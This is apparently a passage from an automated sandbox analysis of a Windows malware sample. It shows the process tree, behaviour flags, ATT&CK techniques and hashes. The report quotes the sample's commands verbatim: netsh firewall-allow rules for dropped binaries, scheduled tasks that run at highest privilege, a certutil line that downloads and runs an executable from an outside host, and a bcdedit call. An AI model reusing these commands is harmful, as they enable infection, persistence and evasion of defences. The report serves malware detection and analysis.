2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 2360 wrote to memory of 3328 2360 csrss.exe 95 PID 3328 wrote to memory of 3968 3328 csrss.exe 101 PID 3328 wrote to memory of 3968 3328 csrss.exe 101 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\9f8a475abce8ee5d836319045b20b65d_JaffaCakes118.exe"4⤵
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f956a05b2009\f956a05b2009\f956a05b2009.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f956a05b2009\f956a05b2009\f956a05b2009.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2036
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""6⤵
- Executes dropped EXE
- Manipulates WinMonFS driver.
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:536
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F7⤵
- Creates scheduled task(s)
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
- Executes dropped EXE
PID:992
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
PID:3968
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
3.9MB
MD59f8a475abce8ee5d836319045b20b65d
SHA189eeee314fd0f4a1bb48a24ed37cb985897660f3
SHA256807457fd6828a6c089bfe1808dd9b21c3820fad6e54e18b517cb0bbd38abc42a
SHA5121f4426cbd2b441e9ae1e1c0f473a97a71b8d1a4eac47743a26c2d7fa64441e59aeb5d9c88c9362a0a7f63a11ffd2a2713f2a3818ce46af3982df3289051f720c